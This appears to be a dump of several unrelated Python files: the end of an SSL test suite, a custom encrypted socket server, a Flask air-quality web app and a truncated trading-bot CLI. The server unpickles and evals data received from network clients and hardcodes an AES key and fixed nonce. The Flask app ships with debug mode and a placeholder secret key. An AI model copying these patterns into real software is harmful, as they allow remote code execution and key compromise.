END_OF_EARLY_DATA = 5
HELLO_RETRY_REQUEST = 6
ENCRYPTED_EXTENSIONS = 8
CERTIFICATE = 11
SERVER_KEY_EXCHANGE = 12
CERTIFICATE_REQUEST = 13
SERVER_DONE = 14
CERTIFICATE_VERIFY = 15
CLIENT_KEY_EXCHANGE = 16
FINISHED = 20
CERTIFICATE_URL = 21
CERTIFICATE_STATUS = 22
SUPPLEMENTAL_DATA = 23
KEY_UPDATE = 24
NEXT_PROTO = 67
MESSAGE_HASH = 254
CHANGE_CIPHER_SPEC = 0x0101
enum._test_simple_enum(Checked_TLSMessageType, _TLSMessageType)
def test_sslmethod(self):
Checked_SSLMethod = enum._old_convert_(
enum.IntEnum, '_SSLMethod', 'ssl',
lambda name: name.startswith('PROTOCOL_') and name != 'PROTOCOL_SSLv23',
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLMethod, ssl._SSLMethod)
def test_options(self):
CheckedOptions = enum._old_convert_(
enum.FlagEnum, 'Options', 'ssl',
lambda name: name.startswith('OP_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedOptions, ssl.Options)
def test_alertdescription(self):
CheckedAlertDescription = enum._old_convert_(
enum.IntEnum, 'AlertDescription', 'ssl',
lambda name: name.startswith('ALERT_DESCRIPTION_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedAlertDescription, ssl.AlertDescription)
def test_sslerrornumber(self):
Checked_SSLMethod = enum._old_convert_(
enum.IntEnum, '_SSLMethod', 'ssl',
lambda name: name.startswith('PROTOCOL_') and name != 'PROTOCOL_SSLv23',
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLMethod, ssl._SSLMethod)
def test_verifyflags(self):
CheckedVerifyFlags = enum._old_convert_(
enum.FlagEnum, 'VerifyFlags', 'ssl',
lambda name: name.startswith('VERIFY_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyFlags, ssl.VerifyFlags)
def test_verifymode(self):
CheckedVerifyMode = enum._old_convert_(
enum.IntEnum, 'VerifyMode', 'ssl',
lambda name: name.startswith('CERT_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyMode, ssl.VerifyMode)
def test_main(verbose=False):
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth, TestSSLDebug
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = threading_helper.threading_setup()
try:
support.run_unittest(*tests)
finally:
threading_helper.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
server.py
|
from re import S
import select
import socket
import queue
import threading
import sys
import pickle
import base64
import os
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from cryptography.hazmat.primitives.serialization import load_ssh_public_key
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.backends import default_backend
import hashlib
import yaml
import random
class IPNC():
def __init__(self):
pass
def _read_yml(self,file = None):
with open(file) as file:
documents = yaml.full_load(file)
return documents
def _write_yml(self,file = None, dict_data = None,mode = "a+"):
with open(file, mode) as file:
yaml.dump(dict_data, file)
def _add_node(self,file = None, node = None):
try:
read = self._read_yml(file)
if read != None:
read[node[0]]
self._change_node_value(file,node)
else:
raise KeyError
except KeyError:
node_dict = {
node[0] : node[1]
}
self._write_yml(file, node_dict)
def _change_node_value(self,file = None, node = None):
r_yml = self._read_yml(file)
r_yml[node[0]] = node[1]
self._write_yml(file = file, dict_data = r_yml, mode = "w")
def _get_node(self,file = None, key = None, wait = True):
if key == None:
return self._read_yml(file)
if wait:
while True:
r_yml = self._read_yml(file)
try:
value = r_yml[key]
return value
except KeyError:
pass
except TypeError:
pass
else:
r_yml = self._read_yml(file)
try:
value = r_yml[key]
return value
except KeyError:
return None
except TypeError:
pass
def _remove_node(self,file,node):
try:
r_yml = self._read_yml(file = file)
r_yml[node]
r_yml.pop(node)
self._write_yml(file = file, dict_data = r_yml, mode = "w")
except KeyError:
return False
except:
pass
def _name_generator(self,_len_ = 16, onlyText = False):
lower_case = list("abcdefghijklmnopqrstuvwxyz")
upper_case = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')
special = list("!@#$%&*?")
number = list("0123456789")
if onlyText:
_all_ = lower_case + upper_case
else:
_all_ = lower_case + upper_case + special + number
random.shuffle(_all_)
return "".join(random.sample(_all_,_len_))
class DSP():
def __init__(
self,
msg : str = None,
DSP_type : str = None,
device_id : int = None,
universalAesKey : bytes = None,
nonce : bytes = None,
aad : str = None,
):
if msg is not None:
self.msg = msg
else:
self.msg = msg
self.DSP_type = DSP_type
self.device_id = device_id
if universalAesKey is not None:
self.UNIVERSAL_AES_KEY = universalAesKey
else:
self.UNIVERSAL_AES_KEY = b't\x89\xcc\x87\xcca\xe8\xfb\x06\xed\xcf+\x0eVB\xd2\xd3\xbeMk\xfa\xd1J\xa7\xc8@\xf8\x05\x0f\xfc\x18\x00'
if nonce is not None:
self.NONCE = nonce
else:
self.NONCE = b'\xfe\x1e1\xc0\xfc`s\xbc6\x9fQ\xb2'
if aad is not None:
self.AAD = aad
else:
self.AAD = b"au$tica&tedbut@u32nencr#cdscypteddatafdrj"
def _messanger(self,MSG = None):
if MSG is not None:
self.msg = MSG
data = f'DSP("{self.msg}","{self.DSP_type}")'
data = pickle.dumps(data)
pickled_data = data
encrypted_data = [self.device_id, self.__encrypt(pickled_data)]
p_e_d = pickle.dumps(encrypted_data)
ret = base64.b64encode(p_e_d)
return ret
def __repr__(self):
return "_main.DSP._"
def __encrypt(self,data):
aesgcm = AESGCM(self.UNIVERSAL_AES_KEY,)
ct = aesgcm.encrypt(
self.NONCE,
data,
self.AAD
)
return ct
def _convert_to_class(self,OBJECT : bytes = None,secure : bool = True, secure_dict : list = None):
try:
OBJECT = base64.b64decode(OBJECT)
OBJECT = pickle.loads(OBJECT)
if secure == True:
if secure_dict is None:
raise TypeError(
"convert_to_class() missing 1 required positional argument: 'secure_lst'")
else:
secure_dict = pickle.loads(base64.b64decode(secure_dict))
aesgcm = AESGCM(secure_dict["aes_key"])
ct = aesgcm.decrypt(
secure_dict["nonce"], OBJECT[-1], secure_dict["aad"])
ct = pickle.loads(ct)
return eval(ct)
else:
aesgcm = AESGCM(self.UNIVERSAL_AES_KEY)
ct = aesgcm.decrypt(self.NONCE, OBJECT[-1], self.AAD)
ct = pickle.loads(ct)
return eval(ct)
except TypeError:
sys.exit()
except ValueError:
print("sender has not done the handshake")
class MAIN(IPNC):
def __init__(self,secure : bool = True,file = None):
"""async_server initializer class that will create the a asyncronouse tcp server.
"""
IPNC.__init__(self)
self.__secure = secure
self.__file_location = file
self.READABLE = []
self.WRITABLE = []
self.INPUTS = []
self.OUTPUTS = []
self.MESSAGE_QUEUES = {}
self.REQUEST_LIST = []
self.REQUEST_RESPONSE_LIST = []
self.MESSAGE_LIST = []
self.__VARIFIED_DEVICES = []
self.__CLIENT_KEYS = {}
self.__CUSTOM_CHANNEL = []
self.__CUSTOM_CHANNEL_MSG_REC = []
self.__CUSTOM_CHANNEL_MSG_SEND = []
self.__VARIFIER_LIST = []
self.__CALLBACK_LOOP = []
self.__RECEIVING_MSG = []
get = self._get_node(file = self.__file_location,key = hashlib.sha256(bytes("key", "utf-8")).digest(), wait = False)
if get is not None:
self.__CLIENT_KEYS = get
self.__VARIFIED_DEVICES.extend(list(get.keys()))
def SERVER(self,address : str = None, port : int = None, listeners : int = None):
self.address = address
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt( socket.SOL_SOCKET, socket.SO_REUSEADDR, 1 )
self.sock.setblocking(0)
self.sock.bind((self.address,self.port))
self.sock.listen(listeners)
print("[SERVER IS ACTIVATED | LISTENING]")
self.INPUTS.append(self.sock)
thread1 = threading.Thread(
target = self.receive_func,
args = (
self.__RECEIVING_MSG,
self.__VARIFIED_DEVICES,
self.__VARIFIER_LIST,
self.__CLIENT_KEYS,
self.OUTPUTS,
self.REQUEST_LIST,
self.REQUEST_RESPONSE_LIST,
self.MESSAGE_LIST,
self.__CUSTOM_CHANNEL_MSG_REC,
)
)
thread2 = threading.Thread(
target = self.send_func,
args = (
self.WRITABLE,
self.MESSAGE_QUEUES,
self.MESSAGE_LIST,
self.REQUEST_LIST,
self.REQUEST_RESPONSE_LIST,
self.__VARIFIER_LIST,
self.__CUSTOM_CHANNEL_MSG_SEND
)
)
thread3 = threading.Thread(
target = self.__callback_loop,
args = (
self.__CALLBACK_LOOP,
)
)
# thread1.daemon = True
thread1.start()
# thread2.daemon = True
thread2.start()
# thread3.daemon = True
thread3.start()
thread = threading.Thread(target = self.__server)
# thread.daemon = True
thread.start()
def __server(self):
data_recv_len = []
while True:
readable, writable, exceptions = select.select(self.INPUTS, self.OUTPUTS, self.INPUTS)
# handling the inputs
for r in readable:
if r is self.sock:
connection,addr = r.accept()
connection.setblocking(0)
self.INPUTS.append(connection)
self.MESSAGE_QUEUES[connection] = queue.Queue()
else:
ini = list(zip(*data_recv_len))
if len(ini) == 0 or r not in ini[0]:
try:
data_len = pickle.loads(base64.b64decode(r.recv(32).decode().strip("0").encode("utf-8")))
except ConnectionResetError:
print("Client Disconnected")
if r in self.OUTPUTS:
self.OUTPUTS.remove(r)
if r in self.WRITABLE:
self.WRITABLE.remove(r)
self.INPUTS.remove(r)
r.close()
del self.MESSAGE_QUEUES[r]
continue
except Exception as e:
pass
if data_len:
if type(data_len) == type([]):
data_recv_len.append(
[
r,
data_len[0]
]
)
else:
print("User Disconnected")
if r in self.OUTPUTS:
self.OUTPUTS.remove(r)
self.INPUTS.remove(r)
if r in self.WRITABLE:
self.WRITABLE.remove(r)
r.close()
del self.MESSAGE_QUEUES[r]
continue
else:
qwe = list(zip(*data_recv_len))
INDEX = qwe[0].index(r)
try:
recv_len = data_recv_len.pop(INDEX)[1]
data = r.recv(recv_len)
try:
data = data.decode().strip("0").encode("utf-8")
except:
print("Error in decoding")
self.__RECEIVING_MSG.append(data)
self.MESSAGE_QUEUES[r].put(pickle.loads(base64.b64decode(data))[0])
if r not in self.OUTPUTS:
self.OUTPUTS.append(r)
except Exception as e:
print("User Disconnected")
readable.remove(r)
self.INPUTS.remove(r)
writable.remove(r)
self.OUTPUTS.remove(r)
if r in self.WRITABLE:
self.WRITABLE.remove(r)
del self.MESSAGE_QUEUES[r]
continue
# handling the outputs
for w in writable:
if w not in self.WRITABLE:
self.WRITABLE.append(w)
# handling the errors
for e in exceptions:
self.INPUTS.remove(e)
if e in self.OUTPUTS:
self.OUTPUTS.remove(e)
e.close()
del self.MESSAGE_QUEUES[e]
def receive_func(self, __receiving_msg,__varified_devices, __varifier_lst, __client_keys, __outputs, __request_lst, __request_res_lst, __message_lst, __custom_c_m_r):
# __receiving_msg = self.__RECEIVING_MSG,
# __varified_devices = self.__VARIFIED_DEVICES,
# __varifier_lst = self.__VARIFIER_LIST,
# __client_keys = self.__CLIENT_KEYS,
# __outputs = self.OUTPUTS,
# __request_lst = self.REQUEST_LIST
# __request_res_lst = self.REQUEST_RESPONSE_LIST
# __message_lst = self.MESSAGE_LIS
# __custom_c_m_r = self.__CUSTOM_CHANNEL_MSG_REC
while True:
try:
for INDEX,_data_ in enumerate(__receiving_msg):
data = pickle.loads(base64.b64decode(_data_))
if data[0] not in __varified_devices:
_recv_ = DSP()._convert_to_class(_data_, secure = False)
if _recv_.DSP_type == "username_secure":
resolved_data = eval(_recv_.msg)
aes_key = AESGCM.generate_key(256)
nonce = os.urandom(32)
aad = bytes(self._name_generator(),"utf-8")
qw = {
"aes_key" : aes_key,
"nonce" : nonce,
"aad" : aad,
}
pickle_qw = pickle.dumps(qw)
b64_aes_key_pack = base64.b64encode(pickle_qw)
key = load_ssh_public_key(
bytes(
resolved_data["data"],
"utf-8"
),
backend=default_backend()
)
ciphertext = key.encrypt(
b64_aes_key_pack,
padding.OAEP(
mgf = padding.MGF1(algorithm = hashes.SHA256()),
algorithm = hashes.SHA256(),
label = None
)
)
ciphertext = base64.b64encode(ciphertext)
prepare_data = {"key" : ciphertext}
dsp_data = DSP(
DSP_type="username_secure_response"
)._messanger(
MSG = prepare_data
)
dsp_data = [resolved_data["username"],dsp_data]
__varifier_lst.append(dsp_data)
__varified_devices.append(resolved_data["username"])
__client_keys[resolved_data["username"]] = b64_aes_key_pack
get = self._get_node(
file = self.__file_location,
key = hashlib.sha256(bytes("key","utf-8")).digest(),
wait = False
)
if get is not None:
get[resolved_data["username"]] = b64_aes_key_pack
self._add_node(
file = self.__file_location,
node = [
hashlib.sha256(bytes("key","utf-8")).digest(),
get
]
)
else:
self._add_node(
file = self.__file_location,
node = [
hashlib.sha256(bytes("key","utf-8")).digest(),
{
resolved_data["username"] : b64_aes_key_pack
}
]
)
__receiving_msg.pop(INDEX)
else:
aes_key_pack = __client_keys[data[0]]
_recv_ = DSP()._convert_to_class(
OBJECT = _data_,
secure = True,
secure_dict = aes_key_pack
)
if _recv_.DSP_type == "DSP_REQ":
try:
resolved_data = eval(_recv_.msg)
resolved_data = pickle.loads(base64.b64decode(eval(_recv_.msg)))
__request_lst.append(
[
resolved_data["target_name"],
_recv_.msg
]
)
__receiving_msg.remove(_data_)
except:
pass
elif _recv_.DSP_type == "DSP_REQ_RES":
try:
resolved_data = pickle.loads(base64.b64decode(eval(_recv_.msg)))
__request_res_lst.append(
[
resolved_data["target_name"],
_recv_.msg
]
)
__receiving_msg.remove(_data_)
except:
pass
elif _recv_.DSP_type == "DSP_MSG":
try:
resolved_data = pickle.loads(base64.b64decode(eval(_recv_.msg)))
__message_lst.append(
[
resolved_data['target_name'],
_recv_.msg
]
)
__receiving_msg.remove(_data_)
except:
pass
elif _recv_.DSP_type in self.__CUSTOM_CHANNEL:
try:
resolved_data = pickle.loads(base64.b64decode(eval(_recv_.msg)))
__custom_c_m_r.append(resolved_data)
__receiving_msg.remove(_data_)
except:
pass
except:
pass
def send_func(self,Writable,message_q,message_list,requestList,requestResList,varifierList,customChannelMessageSend):
while True:
for s in Writable:
if s._closed == True and s.fileno() == -1:
Writable.remove(s)
# try:
try:
username = message_q[s].get_nowait()
message_q[s].put(username)
msg_lst = list(list(zip(*message_list)))
req_lst = list(list(zip(*requestList)))
req_res_lst = list(list(zip(*requestResList)))
vari_lst = list(list(zip(*varifierList)))
send_c_msg = list(zip(*customChannelMessageSend))
except KeyError:
pass
if len(msg_lst) > 0:
if username in msg_lst[0]:
INDEX = msg_lst[0].index(username)
aes_key_pack = self.__CLIENT_KEYS[username]
aes_key_pack = pickle.loads(base64.b64decode(aes_key_pack))
dsp_data = DSP(
DSP_type = "DSP_MSG",
universalAesKey = aes_key_pack["aes_key"],
nonce = aes_key_pack["nonce"],
aad = aes_key_pack["aad"]
)._messanger(
MSG = f"{msg_lst[1][INDEX]}"
).decode().center(len(msg_lst[1][INDEX]) + 100, "|").encode("utf-8")
try:
s.send(bytes(f"{len(dsp_data)}".center(16,"|"),"utf-8"))
s.send(
dsp_data
)
message_list.pop(INDEX)
except OSError:
pass
if len(req_lst) > 0:
if username in req_lst[0]:
INDEX = req_lst[0].index(username)
try:
aes_key_pack = self.__CLIENT_KEYS[username]
except KeyError:
continue
aes_key_pack = pickle.loads(base64.b64decode(aes_key_pack))
dsp_data = DSP(
DSP_type = "DSP_handshake_request",
universalAesKey = aes_key_pack["aes_key"],
nonce = aes_key_pack["nonce"],
aad = aes_key_pack["aad"]
)._messanger(
MSG = f"{req_lst[1][INDEX]}"
).decode().center(len(req_lst[1][INDEX]) + 100, "|").encode("utf-8")
s.send(bytes(f"{len(dsp_data)+100}".center(16,"|"),"utf-8"))
s.send(
dsp_data
)
requestList.pop(INDEX)
if len(req_res_lst) > 0:
if username in req_res_lst[0]:
INDEX = req_res_lst[0].index(username)
aes_key_pack = self.__CLIENT_KEYS[username]
aes_key_pack = pickle.loads(base64.b64decode(aes_key_pack))
dsp_data = DSP(
DSP_type = "DSP_handshake_request_res",
universalAesKey = aes_key_pack["aes_key"],
nonce = aes_key_pack["nonce"],
aad = aes_key_pack["aad"]
)._messanger(
MSG = f"{req_res_lst[1][INDEX]}"
).decode().center(len(req_res_lst[1][INDEX]) + 100, "|").encode("utf-8")
s.send(bytes(f"{len(dsp_data)+100}".center(16,"|"),"utf-8"))
s.send(
dsp_data
)
requestResList.pop(INDEX)
if len(vari_lst) > 0:
if username in vari_lst[0]:
INDEX = vari_lst[0].index(username)
s.send(bytes(f"{len(vari_lst[1][INDEX])}".center(16,"|"),"utf-8"))
s.send(
vari_lst[1][INDEX]
)
varifierList.pop(INDEX)
if len(send_c_msg) > 0:
if username in send_c_msg[0]:
INDEX = send_c_msg[0].index(username)
s.send(bytes(f"{len(send_c_msg[1][INDEX])}".center(16,"|"),"utf-8"))
s.send(send_c_msg[1][INDEX])
customChannelMessageSend.pop(INDEX)
# except:
# pass
def CREATE_CHANNEL(self,channel_name = None, multiple : bool = False):
if multiple:
if type(channel_name) == type([]):
for channel in channel_name:
if channel not in self.__CUSTOM_CHANNEL:
self.__CUSTOM_CHANNEL.append(channel)
else:
print(f"Channel : {channel} already exists.")
else:
raise TypeError("When 'mutliple' is to True then channel_name should be a list of multiple channel names")
else:
if channel_name not in self.__CUSTOM_CHANNEL:
self.__CUSTOM_CHANNEL.append(channel_name)
def LISTEN(self,channel : str = None,function : object = None,args = None):
if channel is not None:
found = False
index = None
if channel in self.__CUSTOM_CHANNEL:
for i,d in enumerate(self.__CUSTOM_CHANNEL_MSG_REC):
if d["channel"] == channel:
found = True
index = i
break
if found:
if args is None:
p_data = self.__CUSTOM_CHANNEL_MSG_REC.pop(index)
self.__CALLBACK_LOOP.append([function,[p_data]])
else:
p_data = self.__CUSTOM_CHANNEL_MSG_REC.pop(index)
args = list(args)
args.insert(0,p_data)
self.__CALLBACK_LOOP.append([function,args])
else:
raise TypeError("'channel' should not be None")
def __callback_loop(self,__callback_loop):
while True:
for index,func in enumerate(__callback_loop):
__callback_loop.pop(index)
func[0](*func[1])
def SEND(self,channel_name,target_name,data):
if channel_name in self.__CUSTOM_CHANNEL:
key_pack = self.__CLIENT_KEYS[target_name]
key_pack = pickle.loads(base64.b64decode(key_pack))
dsp_data = DSP(
DSP_type = channel_name,
universalAesKey=key_pack["aes_key"],
nonce = key_pack["nonce"],
aad= key_pack["aad"]
)._messanger(
MSG = base64.b64encode(pickle.dumps(data))
)
self.__CUSTOM_CHANNEL_MSG_SEND.append(
[
target_name,
dsp_data
]
)
class server():
def __init__(self, secure : bool = True, file : str = None):
"""
This class allows user to create multi-client server.
args:
secure : bool = True -> this should set to the default value True,
file : str = None -> here user need to pass a yaml file which saves all the keys and configurations.
if not specified, will raise an TypeError
"""
if not file:
raise TypeError("asyncServer() missing 1 required positional argument: 'file'")
__parent = MAIN(secure = secure, file = file)
self.SERVER = __parent.SERVER
self.CREATE_CHANNEL = __parent.CREATE_CHANNEL
self.LISTEN = __parent.LISTEN
self.SEND = __parent.SEND
|
Main.py
|
import RethinkDB_Queries as r
import CSV_Download as d
import CSV_Read as csv
import json
from math import cos, asin, sqrt, pi
import rethinkdb as rdb
from flask import Flask, g, render_template, make_response, request, redirect, url_for, jsonify
from flask_socketio import SocketIO, send, emit
from threading import Thread
from rethinkdb import RqlRuntimeError, RqlDriverError
app = Flask(__name__)
socketio = SocketIO(app)
global thread
thread = None
# Load default config and override config from an environment variable
app.config.update(dict(
DEBUG=True,
SECRET_KEY='secret!',
DB_HOST='localhost',
DB_PORT=28015,
DB_NAME='AirQuality'
))
app.config.from_envvar('FLASKR_SETTINGS', silent=True)
def db_work():
# Conexion a la base de datos
connection = r.connect_db("localhost", 28015)
# Nombre del fichero
filename_data = 'data.csv'
filename_magnitudes = 'mag.csv'
filename_estaciones = 'stations.csv'
# Nombre de la base de datos
db_name = 'AirQuality'
table_data = 'datos'
table_mag = 'magnitudes'
table_sta = 'estaciones'
# Descarga del fichero
d.download_file("http://datos.madrid.es/egob/catalogo/212531-10515086-calidad-aire-tiempo-real.csv", filename_data)
# Procesado del fichero de datos en 'data', de magnitudes en 'magnitudes' y de estaciones en 'estaciones'
data = csv.read_file_data(filename_data)
magnitudes = csv.read_file_magnitudes(filename_magnitudes)
estaciones = csv.read_file_estaciones(filename_estaciones)
# Una vez procesado, borramos el fichero
d.drop_file(filename_data)
# Si existe la base de datos la borramos
if r.exist_db(connection, db_name):
r.drop_db(connection, db_name)
# Creamos la base de datos AirQuality, que contendra las tablas con
# los datos, las estaciones y las magnitudes
r.create_db(connection, db_name)
r.create_table(connection, db_name, table_data)
r.create_table(connection, db_name, table_sta)
r.create_table(connection, db_name, table_mag)
# Insertamos los datos obtenidos del CSV descargado
r.insert_data(connection, db_name, table_data, data)
r.insert_data(connection, db_name, table_mag, magnitudes)
r.insert_data(connection, db_name, table_sta, estaciones)
# Mostramos los datos desde la BD
# r.retrieve_data(connection, db_name, table_data)
# r.retrieve_data(connection, db_name, table_mag)
# r.retrieve_data(connection, db_name, table_sta)
# Creamos un indice geoespacial
r.create_geospatial_index(connection, db_name, table_sta, 'coordenadas')
r.wait_index(connection, db_name, table_sta, 'coordenadas')
# Consultamos el punto mas cercano
# r.nearest_points(connection, db_name, table_sta, 'coordenadas', 40.465156, -3.584270)
# Cerramos la conexion
r.close_db(connection)
@app.before_request
def before_request():
g.db_conn = rdb.connect(host=app.config['DB_HOST'],
port=app.config['DB_PORT'],
db=app.config['DB_NAME'])
@app.teardown_request
def teardown_request(exception):
try:
g.db_conn.close()
except AttributeError:
pass
@app.route('/', methods=['GET'])
def show_info():
estaciones = rdb.db(app.config['DB_NAME']).table('estaciones').run(g.db_conn)
# for estacion in estaciones:
# print(estacion['coordenadas']['coordinates'])
magnitudes = None
estaciones_array = []
for estacion in estaciones:
datos_estacion = rdb.db('AirQuality').table('datos').eq_join("ESTACION",
rdb.db("AirQuality").table(
"estaciones")).zip().filter(
{"ESTACION": estacion['id']}).eq_join("MAGNITUD", rdb.db("AirQuality").table('magnitudes')).zip().run(
g.db_conn)
estacion['datos'] = []
for dato_estacion in datos_estacion:
estacion['datos'].append(dato_estacion)
# print(estacion)
estaciones_array.append(estacion)
datos = list(
rdb.db('AirQuality').table('datos').run(g.db_conn, time_format="raw"))
# print(datos)
return render_template('index.html', datos=datos, estaciones=estaciones_array, magnitudes=magnitudes)
def distance(lat1, lon1, lat2, lon2):
p = 0.017453292519943295
a = 0.5 - cos((lat2 - lat1) * p) / 2 + cos(lat1 * p) * cos(lat2 * p) * (1 - cos((lon2 - lon1) * p)) / 2
return 12742 * asin(sqrt(a))
@app.route('/distancia/', methods=['POST'])
def recalcular_distancias():
data = json.loads(request.data)
longitud = data['longitud']
latitud = data['latitud']
# print(longitud)
# print(latitud)
estaciones = rdb.db(app.config['DB_NAME']).table('estaciones').run(g.db_conn)
# for estacion in estaciones:
# print(estacion['coordenadas']['coordinates'])
magnitudes = None
estaciones_array = []
for estacion in estaciones:
# print(estacion['latitud'])
# print(estacion['longitud'])
datos_estacion = rdb.db('AirQuality').table('datos').eq_join("ESTACION",
rdb.db("AirQuality").table(
"estaciones")).zip().filter(
{"ESTACION": estacion['id']}).eq_join("MAGNITUD", rdb.db("AirQuality").table('magnitudes')).zip().run(
g.db_conn)
estacion['datos'] = []
for dato_estacion in datos_estacion:
estacion['datos'].append(dato_estacion)
estacion['distancia'] = distance(float(latitud), float(longitud), float(estacion['latitud']),
float(estacion['longitud']))
# print(estacion)
estaciones_array.append(estacion)
datos = list(
rdb.db('AirQuality').table('datos').run(g.db_conn, time_format="raw"))
estaciones_array = sorted(estaciones_array, key=lambda estacion: estacion['distancia'])
print(estaciones_array)
# print(datos)
# return render_template('index.html', datos=datos, estaciones=estaciones_array, magnitudes=magnitudes)
socketio.emit('reset')
for i, estacion in enumerate(estaciones_array):
if i > 4:
break
print(estacion)
socketio.emit('distancia', estacion)
return make_response('OK', 201)
def cambios_datos():
conn = rdb.connect(host=app.config['DB_HOST'],
port=app.config['DB_PORT'],
db=app.config['DB_NAME'])
estaciones = rdb.table("datos").changes().run(conn)
# for chat in estaciones:
# chat['new_val']['estacion'] = str(chat['new_val']['estacion'])
socketio.emit('nuevo_dato')
if __name__ == '__main__':
db_work()
if thread is None:
thread = Thread(target=cambios_datos)
thread.start()
socketio.run(app, host='0.0.0.0', port=8083)
|
cli.py
|
#!/usr/bin/env python3
# coding: utf-8
# @Author: ArthurBernard
# @Email: arthur.bernard.92@gmail.com
# @Date: 2020-03-17 12:23:25
# @Last modified by: ArthurBernard
# @Last modified time: 2020-08-21 11:07:53
""" A (very) light Command Line Interface. """
# Built-in packages
import logging
import select
import sys
from threading import Thread
import time
# Third party packages
from blessed import Terminal
import fynance as fy
import numpy as np
import pandas as pd
# Local packages
from trading_bot._client import _ClientCLI
from trading_bot.data_requests import get_close
from trading_bot.tools.io import load_config_params, get_df
def _set_text(*args):
""" Set a table. """
n = max(len(arg) for arg in args)
k_list = ['| ' if len(arg[0]) > 1 else '+' for arg in args]
for i in range(n):
i_args, n_spa, j = [], 0, 0
for arg in args:
if len(arg) >= i + 1:
i_args += [arg]
n_spa = max(n_spa, len(str(arg[i])))
for arg in args:
if len(arg[0]) > 1 and len(arg) >= i + 1:
space = ' ' * (n_spa - len(str(arg[i])))
k_list[j] += str(arg[i]) + space + ' |'
if i < n - 1:
k_list[j] += ' '
elif len(arg[0]) == 1 and len(arg) >= i + 1:
k_list[j] += arg[i] * (n_spa + 2) + '+'
else:
if i % 2 == 0:
k_list[j] = k_list[j][:-2] + ' ' * (n_spa + 3) + '|'
else:
k_list[j] = '|' + ' ' * (n_spa + 3) + k_list[j][1:-1]
if i < n - 1:
k_list[j] += ' '
j += 1
return '\n'.join(k_list)
def _zip_text(txt1, txt2, c=' '):
txt1 = txt1.split('\n')
txt2 = txt2.split('\n')
if len(txt1) < len(txt1):
txt1, txt2 = txt2, txt1
n = len(txt2)
txt = list(a + c + b for a, b in zip(txt1[:n], txt2))
txt += txt1[n:]
return '\n'.join(txt)
def _rounder(*args, dec=0):
""" Round each element of a list. """
# return [round(float(arg), dec) for arg in args]
return [round(float(a), dec) if abs(float(a)) < 10e3 else format(a, "5.1e") for a in args]
class _ResultManager: # (ResultManager):
""" Manager object of historical results of strategy.
Attributes
----------
df : pandas.DataFrame
Data with each series to compute performances.
period : int
Maximal number of trading periods per year
metrics : list of str
List of metrics to compute performance. The following are available:
'return', 'perf', 'sharpe', 'calmar', and 'maxdd'.
periods : list of str
Frequency to compute performances. The following are available:
'daily', 'weekly', 'monthly', 'yearly' and 'total'.
Methods
-------
print_stats
set_current_price
set_current_value
set_current_stats
"""
min_freq = None
min_TS = None
max_TS = None
def __init__(self, pnl_dict, period=252): # , metrics=[], periods=[]):
""" Initialize object.
Parameters
----------
pnl : dict of pd.DataFrame
Object to compute and store profit and loss of a trading bot.
metrics : list of str
List of metrics to display results. Is available 'return', 'perf',
'sharpe', 'calmar' and 'maxdd'.
periods : list of str
List of periods to compte metrics. Is available 'daily', 'weekly',
'monthly', 'yearly' and 'total'.
period : int, optional
Number of trading days per year, i.e 252 if trading on classical
market and 364 for crypto-currencies market. Default is 252.
"""
self.pnl = pnl_dict
self.strat_by_pair = {}
for key, value in pnl_dict.items():
idx = value['pnl'].index
if self.max_TS is None or idx[-1] > self.max_TS:
self.max_TS = idx[-1]
self._set_ref_pair(key, value['pair'], value['freq'], idx.min())
ts = (idx[1:] - idx[:-1]).min()
self.pnl[key]['period'] = period * 86400 / ts
index = range(self.min_TS, self.max_TS + 1, self.min_freq)
columns = ['value', 'slippage', 'fee']
self.tot_val = pd.DataFrame(0, index=index, columns=columns)
for k, v in pnl_dict.items():
df = pd.DataFrame(index=index, columns=columns)
idx = v['pnl'].index
if v['vali']:
v['pnl'].loc[:, 'slippage'] = 0.
df.loc[idx, 'value'] = v['pnl'].value.values
df.loc[idx, 'fee'] = v['pnl'].fee.values
df.loc[idx, 'slippage'] = v['pnl'].slippage.values
df.loc[:, 'slippage'] = df.loc[:, 'slippage'].fillna(value=0.)
df.loc[:, 'fee'] = df.loc[:, 'fee'].fillna(value=0.)
df = df.fillna(method='ffill').fillna(method='bfill')
self.tot_val.loc[:, 'value'] += df.value.values
self.tot_val.loc[:, 'slippage'] += df.slippage.values
self.tot_val.loc[:, 'fee'] += df.fee.values
self.metrics = ['return', 'perf', 'sharpe', 'calmar', 'maxdd']
self.periods = ['daily', 'weekly', 'monthly', 'yearly', 'total']
self.logger = logging.getLogger(__name__)
def get_current_stats(self):
""" Display some statistics for some time periods. """
txt_table = [['-'] * (1 + len(self.metrics) + 2),
[' '] + self.metrics + ['slippage', 'cumFees']]
self._update_pnl()
for period in self.periods:
txt_table += [['-'] * (1 + len(self.metrics) + 2), [period]]
# for key, value in self.pnl.items():
